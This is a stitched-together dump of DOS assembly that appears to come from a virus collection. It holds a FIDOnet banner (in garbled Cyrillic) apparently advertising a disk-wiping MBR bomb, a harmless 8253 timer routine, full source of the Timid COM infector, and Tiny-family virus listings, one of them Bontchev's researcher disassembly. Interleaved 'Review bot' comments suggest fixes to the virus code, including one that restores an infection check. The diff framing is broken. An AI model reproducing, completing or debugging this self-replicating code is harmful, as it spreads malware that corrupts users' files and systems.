º Ú¿  Ú¿ ÚÄ º ͹
|
||||
º ³ ³ ³Á³ à º ͹ ÄÄÄÄ<Ä Private Armoury Ä>ÄÄÄÄ
|
||||
º Á Á Á Á ÀÄ º ͹
|
||||
ÌÍÍÍÑÍÍÍÍÍÍÑÍÍ͹ ͹ FIDOnet 2:461/29.444
|
||||
ÌÍÍ͵ BOMB ÆÍÍ͹ ͼ
|
||||
ÈÍÍÍÏÍÍÍÍÍÍÏÍÍͼ
|
||||
|
||||
>-> ˆáâ ««ïæ¨ï ¢ MBR á ¯®«®© § ¬¥®© ®à¨£¨ «ì®£® § £àã§ç¨ª
|
||||
>-> Ž¤®ªà âë© ¢§àë¢ ¯® ¤®á⨦¥¨¨ 㪠§ ®© ¯à¨ ¨áâ ««ï樨 ¤ âë
|
||||
>-> <09>®«®¥ ã¨ç⮦¥¨¥ ¢á¥å DOS-à §¤¥«®¢ 1 ¨ 2 ¦¥áâª¨å ¤¨áª å
|
||||
>-> ‘ãé¥á⢥®¥ ¯®¢à¥¦¤¥¨¥ Non-DOS à §¤¥«®¢ â ¬ ¦¥
|
||||
<-< ‘®åà ¥¨¥ ¯à¥¦¥£® MBR ¢ ä ©«¥ C:\MBR.BAK
|
||||
<-< <09>®«®áâìî ª®¬¬¥â¨à®¢ ë© ¨áå®¤ë© â¥ªáâ (asm286)
|
||||
|
||||
>-> >-> €¢â®à ᨬ ¥â á á¥¡ï ¢áïªãî ®â¢¥âá⢥®áâì § «î¡ë¥ <-< <-<
|
||||
>-> >-> ¯®¢à¥¦¤¥¨ï ¨ä®à¬ 樨, ¯à®¨§®è¥¤è¨¥ ¢ १ã«ìâ ⥠<-< <-<
|
||||
>-> >-> ¥®áâ®à®¦®£® ®¡à 饨ï á ¤ ®© ¯à®£à ¬¬®©... ;))) <-< <-<
|
|
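--- /dev/null
+++ b/timer.asm
@@ -0,0 +1,141 @@
+PAGE ,132
+title \asm_sour\timer.asm HIGH ACCURACY TIMER
+subttl michael e. walraven
+.MODEL MEDIUM
+
+name timer
+.cref
+.lall
+
+;
+; High resolution timer, returns a 32 bit high resolution
+; value which is the amount of elapsed time since the function
+; was last called. The counts are 838.2ns each (1.19318 MHz)
+; time_int() must be called first to set the timer chip to
+; the proper mode.
+; Counter 0 is changed in time_int() and the data from this
+; counter is used in elaptime() so it must not be changed
+; between calls.
+; There should not be any interference in system timing
+; max of 55 msec error introduced by time_int() into absolute
+; system time.
+
+; MEDIUM memory model/microsoft 5.00
+; FAR PROGRAM, NEAR DATA
+; cs: is code segment
+; es: and ds: are data segment
+; ss: within data segment
+; ax: for integer return
+; dx:ax: for long return
+
+.DATA
+; these data items located in the DSEG and can be accessed
+; as near by C programs
+
+PUBLIC SYS_HI
+PUBLIC SYS_LOW
+PUBLIC TIMER_COUNT
+
+SYS_HI DW ? ;TIMER_HI VALUE FOR PREVIOUS CALL
+SYS_LOW DW ? ;TIMER_LOW VALUE FOR PREVIOUS CALL
+TIMER_COUNT DW ? ;8253 TIMER COUNT FOR PREVIOUS CALL
+
+
+; NO ARGUMENTS PASSED to either function
+
+TIMER_MODE EQU 043H
+TIMER0 EQU 040H
+
+BIOS SEGMENT AT 040H
+ORG 06CH
+TIMER_LOW DW ?
+TIMER_HI DW ?
+BIOS ENDS
+
+PAGE
+.CODE
+
+PUBLIC _time_int
+_time_int PROC
+
+; void far time_int(void);
+;
+; SET THE TIMER MODE FOR PULSE OUTPUT, RATHER THAN SQUARE
+; MODE AS SET BY DOS
+
+MOV AL,00110100B ;CTR 0, LSB THEN MSB
+;MODE 2, BINARY
+OUT TIMER_MODE,AL ;MODE REGISTER FOR 8253
+SUB AX,AX ;SET 0, RESULT IN MAX COUNT
+OUT TIMER0,AL
+OUT TIMER0,AL
+RET
+_time_int ENDP
+
+
+PUBLIC _elaptime
+_elaptime PROC
+
+; long int far elaptime(void);
+;
+; DETERMINE ELAPSED TIME SINCE LAST CALL
+; RETURNS 32 BIT (LONG) VALUE WHICH IS
+; NEW - TIMER_HI:TIMER_LO:TIMER_COUNT MINUS
+; OLD - TIMER_HI:TIMER_LO:TIMER_COUNT
+
+; ASSUMPTION MADE THAT 32 BITS WILL NOT OVERFLOW!!!!
+
+PUSH ES
+MOV AX,BIOS
+MOV ES,AX
+ASSUME ES:BIOS
+
+MOV AL,0 ;PREPARE TO LATCH COUNTER
+OUT TIMER_MODE,AL ;LATCH 8253
+
+PUSHF ;SAVE INTERRUPT STATE
+CLI ;TURN INTERRUPT OFF WHILE READING CODE
+IN AL,TIMER0
+MOV DL,AL
+IN AL,TIMER0
+MOV DH,AL ;DX HAS NEW CHIP COUNT(count down value)
+
+MOV BX,ES:TIMER_LOW ;BX HAS SYSTEM TIME LOW WORD
+MOV AX,ES:TIMER_HI ;AX HAS SYSTEM TIME HIGH WORD
+
+; NOW HAVE A 48 BIT WORD AX:BX:DX FOR THE PRESENT TIME
+MOV CX,TIMER_COUNT ;SWAP AND SUBTRACT
+MOV TIMER_COUNT,DX
+SUB CX,DX
+
+; CX: HAS LOW 16 BITS OF DIFFERENCE
+
+MOV DX,SYS_LOW ;SWAP AND SUBTRACT
+MOV SYS_LOW,BX
+SBB BX,DX
+
+; BX: HAS MID 16 BITS OF DIFFERENCE
+
+MOV DX,SYS_HI ;SWAP AND SUBTRACT
+MOV SYS_HI,AX
+SBB AX,DX
+
+; AX: HAS HIGH 16 BITS OF DIFFERENCE
+
+; NOW HAVE A 48 BIT WORD THAT IS DIFFERENCE
+; ONLY PASS BACK 32 BITS AT PRESENT
+; AS DX:AX
+
+MOV AX,CX ;LOW 16 BITS
+MOV DX,BX ;MID 16 BITS
+
+
+POPF
+POP ES
+RET
+_elaptime ENDP
+
+
+END
+
+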
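Review bot: In `_elaptime` the counter-latch command (`MOV AL,0` / `OUT TIMER_MODE,AL`) is issued before `PUSHF` / `CLI`, so an IRQ0 tick can land between the latch and the reads: the latched count then belongs to the pre-tick interval while `ES:TIMER_LOW` / `ES:TIMER_HI` are read post-tick, and the `SUB CX,DX` ... `SBB AX,DX` chain comes out roughly one tick (the ~55 ms the header itself mentions) too large. Move `PUSHF ;SAVE INTERRUPT STATE` and `CLI` up so they precede `MOV AL,0 ;PREPARE TO LATCH COUNTER`; with interrupts masked the latched count and the BIOS tick words are sampled from the same interval (a tick already pending in the interrupt controller remains a corner case that would need the IRR checked, which I have not worked into a fix). The header also assumes no 32-bit overflow but says nothing about the BIOS tick words being reset to zero (as PC BIOSes do at midnight), which would make the `SBB` chain borrow through and return a huge value; a line beside `; ASSUMPTION MADE THAT 32 BITS WILL NOT OVERFLOW!!!!` stating that callers must not span that reset would save the next reader a debugging session.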
@ -0,0 +1,195 @@
|
|||
;TIMID VIRUS asm by Mark Ludwig in 1991.
|
||||
;
|
||||
;-infects .coms only in current directory unless called by dos path statement
|
||||
;-announces each file infected.
|
||||
;297bytes=eff. length
|
||||
;Copied from Mark Ludwig's "The Little Black Book of Computer Viruses"
|
||||
;Slightly modified for A86 assembly.
|
||||
;-asm makes a 64k file, run against 'bait' .com to get 297 byte virus
|
||||
;-fixed bug in code reprinted in his book.
|
||||
;all infected files will have VI at byte position 4-5.
|
||||
;Mark Ludwig claims copyright on this virus and said he will
|
||||
; sue anyone distributing his viruses around. I say have fun!.
|
||||
|
||||
|
||||
main segment byte
|
||||
assume cs:main, ds:main, ss:nothing
|
||||
|
||||
org 100h
|
||||
|
||||
host:
|
||||
jmp near ptr virus_start
|
||||
db 'VI' ;identifies virus
|
||||
mov ah, 4ch
|
||||
mov al, 0
|
||||
int 21h
|
||||
|
||||
virus:
|
||||
|
||||
comfile db '*.com',0
|
||||
|
||||
virus_start:
|
||||
call get_start
|
||||
|
||||
get_start:
|
||||
sub word ptr [vir_start], offset get_start - offset virus
|
||||
mov dx, offset dta
|
||||
mov ah, 1ah
|
||||
int 21h
|
||||
call find_file
|
||||
jnz exit_virus
|
||||
call infect
|
||||
mov dx, offset fname
|
||||
mov [handle] b,24h
|
||||
mov ah, 9
|
||||
int 21h
|
||||
exit_virus: ;bug was here in book
|
||||
mov dx, 80h
|
||||
mov ah, 1ah
|
||||
int 21h
|
||||
mov bx, [vir_start]
|
||||
mov ax, word ptr [bx+(offset start_code)-(offset virus)]
|
||||
mov word ptr [host], ax
|
||||
mov ax, word ptr [bx+(offset start_code)-(offset virus)+2]
|
||||
mov word ptr [host+2],ax
|
||||
mov al, byte ptr [bx+(offset start_code)-(offset virus)+4]
|
||||
mov byte ptr [host+4], al
|
||||
mov [vir_start], 100h
|
||||
ret
|
||||
start_code:
|
||||
nop
|
||||
nop
|
||||
nop
|
||||
nop
|
||||
nop
|
||||
|
||||
find_file:
|
||||
mov dx, [vir_start]
|
||||
add dx, offset comfile-offset virus
|
||||
mov cx, 3fh
|
||||
mov ah, 4eh
|
||||
int 21h
|
||||
|
||||
ff_loop:
|
||||
or al,al
|
||||
jnz ff_done
|
||||
call file_ok
|
||||
jz ff_done
|
||||
mov ah, 4fh
|
||||
int 21h
|
||||
jmp ff_loop
|
||||
|
||||
ff_done:
|
||||
ret
|
||||
|
||||
file_ok:
|
||||
mov dx, offset fname
|
||||
mov ax, 3d02h
|
||||
int 21h
|
||||
jc fok_nzend
|
||||
mov bx, ax
|
||||
push bx
|
||||
mov cx, 5
|
||||
mov dx, offset start_image
|
||||
mov ah, 3fh
|
||||
int 21h
|
||||
pop bx
|
||||
mov ah, 3eh
|
||||
int 21h
|
||||
mov ax, word ptr [fsize]
|
||||
add ax, offset endvirus - offset virus
|
||||
jc fok_nzend
|
||||
cmp byte ptr [start_image], 0e9h
|
||||
jnz fok_zend
|
||||
|
||||
fok_nzend:
|
||||
mov al, 1
|
||||
or al,al
|
||||
ret
|
||||
|
||||
fok_zend:
|
||||
xor al,al
|
||||
ret
|
||||
|
||||
infect:
|
||||
mov dx, offset fname
|
||||
mov ax, 3d02h
|
||||
int 21h
|
||||
mov word ptr [handle],ax
|
||||
|
||||
xor cx,cx
|
||||
mov dx,cx
|
||||
mov bx, word ptr [handle]
|
||||
mov ax, 4202h
|
||||
int 21h
|
||||
|
||||
mov cx, offset final -offset virus
|
||||
mov dx, [vir_start]
|
||||
mov bx, word ptr [handle]
|
||||
mov ah, 40h
|
||||
int 21h
|
||||
|
||||
xor cx,cx
|
||||
mov dx, word ptr [fsize]
|
||||
add dx, offset start_code-offset virus
|
||||
mov bx, word ptr [handle]
|
||||
mov ax, 4200h
|
||||
int 21h
|
||||
|
||||
mov cx, 5
|
||||
mov bx, word ptr [handle]
|
||||
mov dx, offset start_image
|
||||
mov ah, 40h
|
||||
int 21h
|
||||
|
||||
xor cx,cx
|
||||
mov dx,cx
|
||||
mov bx, word ptr [handle]
|
||||
mov ax, 4200h
|
||||
int 21h
|
||||
|
||||
mov bx, [vir_start]
|
||||
mov byte ptr [start_image], 0e9h
|
||||
mov ax, word ptr [fsize]
|
||||
add ax, offset virus_start-offset virus-3
|
||||
mov word ptr [start_image+1], ax
|
||||
mov word ptr [start_image+3], 4956h
|
||||
|
||||
mov cx, 5
|
||||
mov dx, offset start_image
|
||||
mov bx, word ptr [handle]
|
||||
mov ah, 40h
|
||||
int 21h
|
||||
|
||||
mov bx, word ptr [handle]
|
||||
mov ah, 3eh
|
||||
int 21h
|
||||
ret
|
||||
|
||||
final:
|
||||
|
||||
;data area
|
||||
endvirus equ $ + 212
|
||||
org 0ff2ah
|
||||
|
||||
dta db 1ah dup (?)
|
||||
fsize dw 0,0
|
||||
fname db 13 dup (?)
|
||||
handle dw 0
|
||||
start_image db 0,0,0,0,0
|
||||
vstack dw 50h dup (?)
|
||||
vir_start dw (?)
|
||||
|
||||
main ends
|
||||
end host
|
||||
;end of timid.asm
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
|
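Review bot: The header comment `;all infected files will have VI at byte position 4-5` is not backed by `file_ok`: after `cmp byte ptr [start_image], 0e9h` / `jnz fok_zend` the code falls straight into `fok_nzend`, so any COM whose first byte is a near JMP is treated as already infected and skipped, and the 'VI' marker written by `mov word ptr [start_image+3], 4956h` is never read back. The companion listing of the same virus in this commit has `cmp word ptr [start_image+3], 4956h` / `jnz fok_zend` between those two lines; either restore that check here or reword the comment to say this A86 build skips every JMP-prefixed COM regardless of marker. The result of the 5-byte read (`mov ah, 3fh` / `int 21h` in `file_ok`) is also unchecked, so a file shorter than 5 bytes leaves `start_image` holding the previous candidate's bytes, which deserves at least a comment.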
@ -0,0 +1,210 @@
|
|||
;This program is a basic virus that infects just COM files. It gets the first
|
||||
;five bytes of its host and stores them elsewhere in the program and puts a
|
||||
;jump to it at the start, along with the letters "VI", which are used to
|
||||
;by the virus to identify an already infected program.
|
||||
|
||||
|
||||
MAIN SEGMENT BYTE
|
||||
ASSUME CS:MAIN,DS:MAIN,SS:NOTHING
|
||||
|
||||
ORG 100H
|
||||
|
||||
;This is a shell of a program which will release the virus into the system.
|
||||
;All it does is jump to the virus routine, which does its job and returns to
|
||||
;it, at which point it terminates to DOS.
|
||||
|
||||
HOST:
|
||||
jmp NEAR PTR VIRUS_START ;Note: MASM is too stupid to assemble this correctly
|
||||
db 'VI'
|
||||
mov ah,4CH
|
||||
mov al,0
|
||||
int 21H ;terminate normally with DOS
|
||||
|
||||
VIRUS: ;this is a label for the first byte of the virus
|
||||
|
||||
COMFILE DB '*.COM',0 ;search string for a com file
|
||||
|
||||
VIRUS_START:
|
||||
call GET_START ;get start address - this is a trick to determine the location of the start of this program
|
||||
GET_START: ;put the address of GET_START on the stack with the call,
|
||||
sub WORD PTR [VIR_START],OFFSET GET_START - OFFSET VIRUS ;which is overlayed by VIR_START. Subtract offsets to get @VIRUS
|
||||
mov dx,OFFSET DTA ;put DTA at the end of the virus for now
|
||||
mov ah,1AH ;set new DTA function
|
||||
int 21H
|
||||
call FIND_FILE ;get a com file to attack
|
||||
jnz EXIT_VIRUS ;returned nz - no file to infect, exit
|
||||
call INFECT ;have a good COM file to use - infect it
|
||||
mov dx,OFFSET FNAME ;display the name of the file just infected
|
||||
mov WORD PTR [HANDLE],24H ;make sure the string terminates, put '$' after it
|
||||
mov ah,9
|
||||
int 21H ;display it
|
||||
EXIT_VIRUS:
|
||||
mov dx,80H ;fix the DTA so that the host program doesn't
|
||||
mov ah,1AH ;get confused and write over its data with
|
||||
int 21H ;file i/o or something like that!
|
||||
mov bx,[VIR_START] ;get the start address of the virus
|
||||
mov ax,WORD PTR [bx+(OFFSET START_CODE)-(OFFSET VIRUS)] ;restore the 5 original bytes
|
||||
mov WORD PTR [HOST],ax ;of the COM file to their
|
||||
mov ax,WORD PTR [bx+(OFFSET START_CODE)-(OFFSET VIRUS)+2] ;to the start of the file
|
||||
mov WORD PTR [HOST+2],ax
|
||||
mov al,BYTE PTR [bx+(OFFSET START_CODE)-(OFFSET VIRUS)+4] ;to the start of the file
|
||||
mov BYTE PTR [HOST+4],al
|
||||
mov [VIR_START],100H ;set up stack to do return to host program
|
||||
ret ;and return to host
|
||||
|
||||
START_CODE: ;move first 5 bytes from host program to here
|
||||
nop ;nop's for the original assembly code
|
||||
nop ;will work fine
|
||||
nop
|
||||
nop
|
||||
nop
|
||||
|
||||
;--------------------------------------------------------------------------
|
||||
;Find a file which passes FILE_OK
|
||||
;
|
||||
;This routine does a simple directory search to find a COM file in the
|
||||
;current directory, to find a file for which FILE_OK returns with C reset.
|
||||
;
|
||||
FIND_FILE:
|
||||
mov dx,[VIR_START]
|
||||
; add dx,OFFSET COMFILE - OFFSET VIRUS ;this is zero here, so omit it
|
||||
mov cx,3FH ;search for any file, no matter what the attributes
|
||||
mov ah,4EH ;do DOS search first function
|
||||
int 21H
|
||||
FF_LOOP:
|
||||
or al,al ;is DOS return OK?
|
||||
jnz FF_DONE ;no - quit with Z reset
|
||||
call FILE_OK ;return ok - is this a good file to use?
|
||||
jz FF_DONE ;yes - valid file found - exit with z set
|
||||
mov ah,4FH ;not a valid file, so
|
||||
int 21H ;do find next function
|
||||
jmp FF_LOOP ;and go test next file for validity
|
||||
FF_DONE:
|
||||
ret
|
||||
|
||||
|
||||
;--------------------------------------------------------------------------
|
||||
;Function to determine whether the COM file specified in FNAME is useable.
|
||||
;if so return z, else return nz.
|
||||
;What makes a COM file useable?:
|
||||
; a) There must be space for the virus without exceeding the
|
||||
; 64 KByte file size limit.
|
||||
; b) Bytes 0, 3 and 4 of the file are not a near jump op code,
|
||||
; and 'V', 'I', respectively
|
||||
;
|
||||
FILE_OK:
|
||||
mov dx,OFFSET FNAME ;first open the file
|
||||
mov ax,3D02H ;r/w access open file, since we'll want to write to it
|
||||
int 21H
|
||||
jc FOK_NZEND ;error opening file - quit and say this file can't be used
|
||||
|
||||
mov bx,ax ;put file handle in bx
|
||||
push bx ;and save it on the stack
|
||||
mov cx,5 ;next read 5 bytes at the start of the program
|
||||
mov dx,OFFSET START_IMAGE ;and store them here
|
||||
mov ah,3FH ;DOS read function
|
||||
int 21H
|
||||
|
||||
pop bx ;restore the file handle
|
||||
mov ah,3EH
|
||||
int 21H ;and close the file
|
||||
|
||||
mov ax,WORD PTR [FSIZE] ;get the file size of the host
|
||||
add ax,OFFSET ENDVIRUS - OFFSET VIRUS ;and add the size of the virus to it
|
||||
jc FOK_NZEND ;c set if ax overflows, which will happen if size goes above 64K
|
||||
cmp BYTE PTR [START_IMAGE],0E9H ;size ok - is first byte a near jump op code?
|
||||
jnz FOK_ZEND ;not a near jump, file must be ok, exit with z set
|
||||
cmp WORD PTR [START_IMAGE+3],4956H ;ok, is 'VI' in positions 3 & 4?
|
||||
jnz FOK_ZEND ;no, file can be infected, return with Z set
|
||||
FOK_NZEND:
|
||||
mov al,1 ;we'd better not infect this file
|
||||
or al,al ;so return with z reset
|
||||
ret
|
||||
FOK_ZEND:
|
||||
xor al,al ;ok to infect, return with z set
|
||||
ret
|
||||
|
||||
;--------------------------------------------------------------------------
|
||||
;This routine moves the virus (this program) to the end of the COM file
|
||||
;Basically, it just copies everything here to there, and then goes and
|
||||
;adjusts the 5 bytes at the start of the program and the five bytes stored
|
||||
;in memory.
|
||||
;
|
||||
INFECT:
|
||||
mov dx,OFFSET FNAME ;first open the file
|
||||
mov ax,3D02H ;r/w access open file, since we'll want to write to it
|
||||
int 21H
|
||||
mov WORD PTR [HANDLE],ax ;and save the file handle here
|
||||
|
||||
xor cx,cx ;prepare to write virus on new file; positon file pointer
|
||||
mov dx,cx ;cx:dx pointer = 0
|
||||
mov bx,WORD PTR [HANDLE]
|
||||
mov ax,4202H ;locate pointer to end DOS function
|
||||
int 21H
|
||||
|
||||
mov cx,OFFSET FINAL - OFFSET VIRUS ;now write the virus; cx=number of bytes to write
|
||||
mov dx,[VIR_START] ;ds:dx = place in memory to write from
|
||||
mov bx,WORD PTR [HANDLE] ;bx = file handle
|
||||
mov ah,40H ;DOS write function
|
||||
int 21H
|
||||
|
||||
xor cx,cx ;now we have to go save the 5 bytes which came from the start of the
|
||||
mov dx,WORD PTR [FSIZE] ;so position the file pointer
|
||||
add dx,OFFSET START_CODE - OFFSET VIRUS ;to where START_CODE is in the new virus
|
||||
mov bx,WORD PTR [HANDLE]
|
||||
mov ax,4200H ;and use DOS to position the file pointer
|
||||
int 21H
|
||||
|
||||
mov cx,5 ;now go write START_CODE in the file
|
||||
mov bx,WORD PTR [HANDLE] ;get file handle
|
||||
mov dx,OFFSET START_IMAGE ;during the FILE_OK function above
|
||||
mov ah,40H
|
||||
int 21H
|
||||
|
||||
xor cx,cx ;now go back to the start of host program
|
||||
mov dx,cx ;so we can put the jump to the virus in
|
||||
mov bx,WORD PTR [HANDLE]
|
||||
mov ax,4200H ;locate file pointer function
|
||||
int 21H
|
||||
|
||||
mov bx,[VIR_START] ;calculate jump location for start of code
|
||||
mov BYTE PTR [START_IMAGE],0E9H ;first the near jump op code E9
|
||||
mov ax,WORD PTR [FSIZE] ;and then the relative address
|
||||
add ax,OFFSET VIRUS_START-OFFSET VIRUS-3 ;these go in the START_IMAGE area
|
||||
mov WORD PTR [START_IMAGE+1],ax
|
||||
mov WORD PTR [START_IMAGE+3],4956H ;and put 'VI' ID code in
|
||||
|
||||
mov cx,5 ;ok, now go write the 5 bytes we just put in START_IMAGE
|
||||
mov dx,OFFSET START_IMAGE ;ds:dx = pointer to START_IMAGE
|
||||
mov bx,WORD PTR [HANDLE] ;file handle
|
||||
mov ah,40H ;DOS write function
|
||||
int 21H
|
||||
|
||||
mov bx,WORD PTR [HANDLE] ;finally, get handle off of stack
|
||||
mov ah,3EH ;and close file
|
||||
int 21H
|
||||
|
||||
ret ;all done, the virus is transferred
|
||||
|
||||
FINAL: ;label for last byte of code to be kept in virus when it moves
|
||||
|
||||
ENDVIRUS EQU $ + 212 ;label for determining space needed by virus
|
||||
;Note: 212 = FFFF - FF2A - 1 = size of data space
|
||||
; $ gives approximate size of code required for virus
|
||||
|
||||
ORG 0FF2AH
|
||||
|
||||
DTA DB 1AH dup (?) ;this is a work area for the search function
|
||||
FSIZE DW 0,0 ;file size storage area
|
||||
FNAME DB 13 dup (?) ;area for file path
|
||||
HANDLE DW 0 ;file handle
|
||||
START_IMAGE DB 0,0,0,0,0 ;an area to store 3 bytes for reading and writing to file
|
||||
VSTACK DW 50H dup (?) ;stack for the virus program
|
||||
VIR_START DW (?) ;start address of VIRUS (overlays the stack)
|
||||
|
||||
|
||||
MAIN ENDS
|
||||
|
||||
|
||||
END HOST
|
||||
|
|
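Review bot: `call GET_START` only works because the pushed return address lands in `VIR_START` at 0FFFCh, i.e. the code assumes DOS loaded the host into a full 64K segment so that SP is 0FFFEh on entry; the comment `;start address of VIRUS (overlays the stack)` hints at this, but nothing at `VIRUS_START` checks it, and with less memory available the `sub WORD PTR [VIR_START],...` adjusts an unrelated word and `mov dx,[VIR_START]` in `FIND_FILE` points DX at garbage. I would state the invariant where it is relied on, e.g. `; assumes SP=0FFFEh at entry (COM loaded into a full 64K segment): the CALL below pushes onto VIR_START, so the offset math after it is wrong otherwise`. A guard such as `cmp sp,0FFFEh` before the call is possible, but bailing out could not go through `EXIT_VIRUS` (it also reads `VIR_START`), so it would need its own return path — I have not worked that out here.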
@ -0,0 +1,81 @@
|
|||
VSize = 085h
|
||||
|
||||
Code Segment
|
||||
Assume CS:Code
|
||||
Org 600h
|
||||
|
||||
Bytes db 0CDh,20h,90h,90h
|
||||
|
||||
Start: mov si, 0100h
|
||||
mov bx, offset Int21
|
||||
mov cx, 0050h
|
||||
mov di, si
|
||||
add si, [si+2]
|
||||
push di
|
||||
movsw
|
||||
movsw
|
||||
mov es, cx
|
||||
cmpsb
|
||||
je StartFile
|
||||
dec si
|
||||
dec di
|
||||
rep movsw
|
||||
mov es, cx
|
||||
xchg ax, bx
|
||||
xchg ax, cx
|
||||
Loop0: xchg ax, cx
|
||||
xchg ax, word ptr es:[di-120h]
|
||||
stosw
|
||||
jcxz Loop0
|
||||
xchg ax, bx
|
||||
StartFile:
|
||||
push ds
|
||||
pop es
|
||||
ret
|
||||
|
||||
Int21: cmp ax, 4B00h
|
||||
jne End21
|
||||
Exec: push ax bx dx ds es
|
||||
mov ax, 3D02h
|
||||
call DoInt21
|
||||
jc EndExec
|
||||
cbw ; Zero AH
|
||||
cwd ; Zero DX
|
||||
mov bx, si ; Move handle to BX
|
||||
mov ds, ax ; Set DS and ES to 60h,
|
||||
mov es, ax ; the virus data segment
|
||||
mov ah, 3Fh ; Read first 4 bytes
|
||||
int 69h
|
||||
mov al, 4Dh
|
||||
scasb ; Check for 4D5Ah or infected file mark
|
||||
je Close ; .EXE or already infected
|
||||
mov al, 2
|
||||
call LSeek ; Seek to the end, SI now contains file size
|
||||
mov cl, VSize ; Virus size in CX, prepare to write
|
||||
int 69h ; AH is 40h, i.e. Write operation
|
||||
mov ax, 0E94Dh ; Virus header in AX
|
||||
stosw ; Store it
|
||||
xchg ax, si ; Move file size in AX
|
||||
stosw ; Complete JMP instruction
|
||||
xchg ax, dx ; Zero AX
|
||||
call LSeek ; Seek to the beginning
|
||||
int 69h ; AH is 40h, write the virus header
|
||||
Close: mov ah,3Eh ; Close the file
|
||||
int 69h
|
||||
EndExec: pop es ds dx bx ax
|
||||
End21: jmp dword ptr cs:[69h * 4]
|
||||
|
||||
LSeek: mov ah, 42h ; Seek operation
|
||||
cwd ; Zero DX
|
||||
DoInt21: xor cx, cx ; External entry for Open, zero cx
|
||||
int 69h
|
||||
mov cl, 4 ; 4 bytes will be read/written
|
||||
xchg ax, si ; Store AX in SI
|
||||
mov ax, 4060h ; Prepare AH for Write
|
||||
xor di, di ; Zero DI
|
||||
ret
|
||||
|
||||
VLen = $ - offset Bytes
|
||||
|
||||
Code EndS
|
||||
End
|
|
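Review bot: This listing carries no identifying header, unlike the TINY-1xx listings that follow, which open with `name`, `title`, the analyst's banner and the note that the disassembly was re-assembled under MASM 5.0; here a reader has to infer the variant from `VSize = 085h`, and the `VLen` symbol defined at the end of the body is never referenced, so nothing states what `VSize` denotes. A header comment of the form `; <variant identifier — PLACEHOLDER>: disassembly of a Tiny-family sample; VSize is the body length written on infection` placed before `VSize = 085h` would document it. The `Start`/`Int21` labels also lack the short purpose comments the later listings give their `v_entry`/`int_21` counterparts.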
@ -0,0 +1,162 @@
|
|||
page ,132
|
||||
name TINY134
|
||||
title The 'Tiny' virus, version TINY-134
|
||||
.radix 16
|
||||
|
||||
; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
|
||||
; º Bulgaria, 1404 Sofia, kv. "Emil Markov", bl. 26, vh. "W", et. 5, ap. 51 º
|
||||
; º Telephone: Private: +359-2-586261, Office: +359-2-71401 ext. 255 º
|
||||
; º º
|
||||
; º The 'Tiny' Virus, version TINY-134 º
|
||||
; º Disassembled by Vesselin Bontchev, September 1990 º
|
||||
; º º
|
||||
; º Copyright (c) Vesselin Bontchev 1989, 1990 º
|
||||
; º º
|
||||
; º This listing is only to be made available to virus researchers º
|
||||
; º or software writers on a need-to-know basis. º
|
||||
; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
|
||||
|
||||
; The disassembly has been tested by re-assembly using MASM 5.0.
|
||||
|
||||
code segment
|
||||
assume cs:code, ds:code
|
||||
|
||||
org 100
|
||||
|
||||
seg_60 equ 600
|
||||
v_len equ v_end-first4
|
||||
|
||||
start:
|
||||
jmp v_entry ; Jump to virus code
|
||||
db 'M' ; Virus signature
|
||||
|
||||
; The original first 4 bytes of the infected file:
|
||||
|
||||
first4 db 0CDh, 20, 90, 90
|
||||
|
||||
v_entry:
|
||||
mov si,0FF ; Initialize some registers
|
||||
mov di,offset start ; Put the addres of program start in DI
|
||||
mov bx,int_21-first4+seg_60 ; Point BX at new INT 13h handler
|
||||
|
||||
; The virus will be installed in memory at
|
||||
; address 0050:0100h (i.e., at segment 60h):
|
||||
|
||||
mov cx,50
|
||||
|
||||
add si,[si+2] ; Determine the start addres of the virus body
|
||||
|
||||
push di ; Now a Near RET instruction will run the prg.
|
||||
|
||||
movsw ; Restore the original first 4 bytes
|
||||
movsw
|
||||
|
||||
mov es,cx ; Point ES:DI at 0050:0100h
|
||||
cmpsb ; Check if the virus is present in memory
|
||||
jz run ; Just run the program if so
|
||||
|
||||
; Virus not in memory. Install it there:
|
||||
|
||||
dec si ; Correct SI & DI to point at the start of
|
||||
dec di ; virus code and to destination address
|
||||
rep movsw ; Move the virus there
|
||||
|
||||
mov es,cx ; ES := 0
|
||||
|
||||
; Move the INT 21h handler to INT 32h and
|
||||
; install int_21 as new INT 21h handler.
|
||||
; By the way, now DI == 1A4h (i.e., 69h*4):
|
||||
|
||||
xchg ax,bx ; Thransfer INT 21h vector to INT 69h,
|
||||
xchg ax,cx ; preserving AX
|
||||
lp:
|
||||
xchg ax,cx ; Get a word
|
||||
xchg ax,es:[di-(69-21)*4] ; Swap the two words
|
||||
stosw ; Save the word
|
||||
jcxz lp ; Loop until done (two times)
|
||||
|
||||
xchg ax,bx ; Restore AX (to keep progs as DISKCOPY happy)
|
||||
|
||||
run:
|
||||
push ds ; Restore ES
|
||||
pop es
|
||||
ret ; And exit (go to CS:100h)
|
||||
|
||||
int_21: ; New INT 21h handler
|
||||
cmp ax,4B00 ; EXEC function call?
|
||||
jne end_21 ; Exit if not
|
||||
|
||||
push ax ; Save registers used
|
||||
push bx
|
||||
push dx
|
||||
push ds
|
||||
push es
|
||||
|
||||
mov ax,3D02 ; Open the file for both reading and writting
|
||||
call do_int21
|
||||
jc end_exec ; Exit on error
|
||||
|
||||
cbw ; Zero AH
|
||||
cwd ; Zero DX
|
||||
mov bx,si ; Save handle in BX
|
||||
mov ds,ax ; Set DS and ES to 60h,
|
||||
mov es,ax ; the virus data segment
|
||||
|
||||
mov ah,3F ; Read the first 4 bytes
|
||||
int 69
|
||||
|
||||
; Check whether the file is already infected or is an .EXE file.
|
||||
; The former contains the character `M' in its 3rd byte and
|
||||
; the latter contains it either in the 0th or in the 1st byte.
|
||||
|
||||
mov al,'M' ; Look for `M'
|
||||
repne scasb
|
||||
jz end_exec ; Exit if file not suitable for infection
|
||||
|
||||
mov al,2 ; Seek to the end of file
|
||||
call lseek ; SI now contains the file size
|
||||
|
||||
mov cl,v_len ; Length of virus body
|
||||
int 69 ; Append the virus to the file (AH is now 40h)
|
||||
|
||||
